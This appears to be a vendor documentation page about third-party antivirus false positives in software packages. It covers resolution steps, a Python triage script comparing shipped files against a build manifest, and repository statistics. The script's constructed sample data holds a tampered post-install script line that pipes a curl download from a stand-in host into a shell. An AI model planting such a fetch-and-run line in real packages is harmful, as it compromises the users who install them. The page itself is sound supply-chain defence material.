SQ30101
Detected possible false positive detections by third-party scanners.
priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
---|---|---|---|---|---|
None | pass | low | medium | None | malware: warning Reason: antivirus false positives detected |
About the issue
False positive detections may cause users to hesitate to deploy a software package. One or more third-party security solutions have flagged parts of the package as malicious. These are individual malicious-code detection reports; there is no industry-wide consensus that confirms them. This commonly happens when a third-party scanner runs advanced detection heuristics that carry a higher false positive rate. There is, however, a small chance that the detection is a true positive and an early indication of a software supply chain attack.
How to resolve the issue
- Investigate the reported detections: which files were flagged, by which engines, and under which detection names.
- If the intended behavior of the software does not explain the detection, investigate your build and release environment for a software supply chain compromise.
- Delay the software release until the investigation is completed.
- Report confirmed false positive detections to the security solution providers.
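One way to script the four steps above, as an added example that is not part of this page or of Spectra Assure. It assumes the scanner output has been reduced to a map of file path to (engine, detection name) pairs, that the build job recorded a SHA-256 manifest of what it produced, and that detection names containing words such as "Heur", "Generic" or "Suspicious" come from heuristic engines; the engine names, detection names, file contents and manifest are all constructed, and the heuristic-name regex is a rule of thumb, not a vendor list.

```python
"""Triage of third-party antivirus hits on a release candidate.

Added example, not ReversingLabs/Spectra Assure code. It assumes the scanner
output has been reduced to {path: [(engine, detection name), ...]} and that the
build job recorded a SHA-256 manifest; that shape and all sample data below are
constructed for illustration.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Detection names that typically come from heuristic/generic/ML classifiers
# rather than a named family (assumed rule of thumb). Heuristic-only hits are
# the usual false-positive pattern; several engines agreeing on one family are not.
HEURISTIC_NAME = re.compile(
    r"heur|generic|\bgen\b|suspicious|unsafe|riskware|\bml\b|not-a-virus", re.I)

Detections = List[Tuple[str, str]]  # (engine, detection name)

@dataclass
class Triage:
    path: str
    engines: List[str]
    named_families: List[str] = field(default_factory=list)
    # True: shipped bytes equal the build manifest; False: they differ;
    # None: the build never recorded this file at all.
    hash_matches_manifest: Optional[bool] = None
    verdict: str = ""

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def classify_detections(detections: Detections) -> Tuple[Detections, Detections]:
    """Split hits into heuristic-style and named-family detections."""
    heuristic, named = [], []
    for engine, name in detections:
        (heuristic if HEURISTIC_NAME.search(name) else named).append((engine, name))
    return heuristic, named

def triage_file(path: str, detections: Detections,
                manifest: Dict[str, str], shipped: Dict[str, bytes]) -> Triage:
    _, named = classify_detections(detections)
    t = Triage(path=path, engines=[e for e, _ in detections],
               named_families=sorted({n for _, n in named}))
    if path in manifest and path in shipped:
        t.hash_matches_manifest = sha256_hex(shipped[path]) == manifest[path]
    # A flagged file whose bytes differ from what the build produced (or that
    # the build never produced) points at the pipeline, not at the scanner.
    if t.hash_matches_manifest is not True:
        t.verdict = "investigate-compromise"
    elif len({e for e, _ in named}) >= 2:
        t.verdict = "likely-true-positive"   # independent engines agree on a family
    elif named:
        t.verdict = "needs-review"           # one named hit is not enough to decide
    else:
        t.verdict = "likely-false-positive"  # heuristic-only, unchanged since build
    return t

def triage_report(report: Dict[str, Detections], manifest: Dict[str, str],
                  shipped: Dict[str, bytes]) -> List[Triage]:
    return [triage_file(p, d, manifest, shipped) for p, d in report.items()]

def release_allowed(triages: List[Triage]) -> bool:
    """Hold the release while any finding is still open."""
    return all(t.verdict == "likely-false-positive" for t in triages)

def false_positive_submissions(triages: List[Triage],
                               shipped: Dict[str, bytes]) -> List[Tuple[str, str, str]]:
    """(engine, path, sha256) tuples to report to each vendor's false-positive desk."""
    return [(engine, t.path, sha256_hex(shipped[t.path]))
            for t in triages if t.verdict == "likely-false-positive"
            for engine in t.engines]

# Constructed sample data: what the build produced vs. what is about to ship.
BUILD_OUTPUT = {
    "bin/installer.exe": b"MZ\x90\x00" + b"\x00" * 60 + b"constructed installer stub",
    "lib/helper.dll": b"MZ\x90\x00" + b"\x00" * 60 + b"constructed helper",
    "scripts/postinstall.js": b"console.log('constructed post-install step');",
}
BUILD_MANIFEST = {p: sha256_hex(b) for p, b in BUILD_OUTPUT.items()}
SHIPPED = dict(BUILD_OUTPUT)
SHIPPED["scripts/postinstall.js"] = b"require('child_process').exec('curl http://example.invalid | sh');"

SAMPLE_REPORT = {  # reduced scanner output, constructed
    "bin/installer.exe": [("EngineA", "Heur.Packed.Generic"), ("EngineB", "Suspicious.ML.Score")],
    "lib/helper.dll": [("EngineA", "Trojan.Agent.ABC"), ("EngineC", "Trojan.Agent.ABC")],
    "scripts/postinstall.js": [("EngineB", "Heur.Script.Downloader")],
}

if __name__ == "__main__":
    results = triage_report(SAMPLE_REPORT, BUILD_MANIFEST, SHIPPED)
    for t in results:
        print(f"{t.path}: {t.verdict} engines={t.engines} families={t.named_families}")
    print("release allowed:", release_allowed(results))
    print("false-positive submissions:", false_positive_submissions(results, SHIPPED))
```

On the constructed data the installer is heuristic-only and byte-identical to the build output, so it goes to the vendors' false-positive desks; the helper library is named by two independent engines and is held for analysis; and the post-install script fails the manifest comparison, which is the case the second resolution step is about. Because one finding is still open, `release_allowed` returns False and the release stays on hold.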
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total number of packages analyzed
- RubyGems: 183K
- NuGet: 644K
- PyPI: 628K
- npm: 3.72M
Recommended reading
- False positive (External resource - NIST)